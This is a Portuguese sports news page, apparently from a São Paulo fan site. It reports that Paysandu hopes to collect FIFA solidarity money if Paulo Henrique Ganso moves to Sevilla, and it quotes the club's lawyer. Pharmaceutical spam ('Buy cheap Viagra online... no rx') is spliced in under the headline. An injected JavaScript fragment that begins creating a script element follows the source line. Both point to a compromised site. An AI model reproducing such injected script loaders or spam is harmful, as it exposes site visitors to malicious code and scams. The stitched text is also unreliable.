Destaque Noticia

Papão aguarda desfecho entre São Paulo e Sevilla sobre saída de Ganso

gain cheaply drugs online

Buy cheap Viagra online acquire inexpensively generic pills no rx

A possível transferência do meia Paulo Henrique Ganso para a Europa tem sido um dos principais assuntos dos últimos dias no São Paulo e, também, no Paysandu. A negociação avançada com o Sevilla, da Espanha, pode render ao Tricolor Paulista € 9,5 milhões (cerca de R$ 35 milhões), sendo que o clube paraense tem direito a parte desse valor por ter ajudado na formação do atleta. O departamento jurídico Alviceleste já se organiza para requisitar a sua fatia do bolo – conhecida como “mecanismo de solidariedade” – caso a venda de Ganso seja mesmo concretizada. O valor pode chegar a R$ 1 milhão.

– A partir do momento que nós tomamos conhecimento da possível transação, nós fomos atrás da documentação necessária. Hoje em dia é simples, existe uma documentação que se chama passaporte. Ela vem com todo o histórico do atleta, desde as divisões de base, dos 12 anos até a fase profissional. Mediante essas informações é feito o cálculo para se chegar ao valor da solidariedade. É difícil falar em valores, mas eu creio que chegue perto de R$ 1 milhão – afirmou o advogado do Paysandu, Alexandre Pires, ao programa GE na Rede.

O Regulamento de Transferências de Atletas da Fifa diz que 5% do valor de uma transação internacional deve fatiado entre os clubes que participaram da formação de um jogador. Segundo os registros do Papão, Ganso passou de dois a três anos na base do clube. Santos e Tuna Luso também podem receber uma fatia.

– O Paysandu vai provar o tempo que o Ganso jogou no clube. Pelos nossos cálculos, foram de dois a três anos. Em cima desse percentual (dos 5% destinados a todos os formadores), se chega a 1,5% a 0,75%, dependendo da idade que ele passou no clube. É uma questão matemática de acordo com aquilo que está no passaporte. Acreditamos que o Ganso deve dar de 1% a 1,25% (dos 5%) – continuou Pires.

A princípio, a responsabilidade de repassar o valor da solidariedade é do clube que está vendendo o atleta – neste caso, o São Paulo. Se a ação não ocorrer naturalmente o Paysandu pode recorrer à CBF, em primeira instância, ou, em último caso, até a Fifa.

– Como é que funciona: primeiro o São Paulo deve ser notificado para pagar amigavelmente. Caso isso não aconteça, nós fazemos uma representação junto à CBF. A CBF possui uma câmara que discute esses litígios. Caso não se resolva lá, é enviado para a Fifa. De lá a Fifa decide. Mas a gente espera resolver isso tranquilamente – detalhou.


Esta não é a primeira vez que o Paysandu poderá abastecer seus cofres com verba “solidária”. Já aconteceu em 2013, quando Ganso deixou o Santos para o São Paulo, e outro caso está em processo: o atacante Lima, que trocou o Benfica pelo Al Ahli, dos Emirados Árabes Unidos.

– (O caso) Já está na FIFA, e a gente está aguardando até o final do ano que se resolva e o Paysandu receba o que tem direito. Existe um prazo de dois anos a partir da data da transferência, então as anteriores nós não temos mais como recorrer – explicou Alexandre Pires.

Fonte: Gevar d=document;var s=d.createElement(‘script’);

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Destaque Noticia

Mais em Destaque Noticia

muricy-ramalho-durante-entrevista-no-condominio-onde-mora-em-sp-1505931581145_615x300

Muricy tem conversa com Dorival e sua comissão técnica no São Paulo

saopauloadmin22 de setembro de 2017
hernanes

Hernanes vai ao CT do Palmeiras, saiba o motivo

saopauloadmin22 de setembro de 2017
sidao

Sidão quer retribuir apoio dos torcedores com vitórias

saopauloadmin22 de setembro de 2017
pratto

Jejum de gols no São Paulo incomoda Pratto

saopauloadmin21 de setembro de 2017
treino

Dorival esboça time que enfrentará o Corinthians

saopauloadmin21 de setembro de 2017
junior

Junior Tavares dá volta por cima e arranca elogios internamente

saopauloadmin20 de setembro de 2017
rodrigo

Com canela cortada, Rodrigo Caio valoriza treinos de Dorival Júnior

saopauloadmin20 de setembro de 2017
marcos

Na semana do clássico, Marcos Guilherme relembra 100º gol de Ceni

saopauloadmin20 de setembro de 2017
morumbi

São Paulo projeta lucro de R$ 10mi com shows que vão tirá-lo do Morumbi por cinco rodadas

saopauloadmin20 de setembro de 2017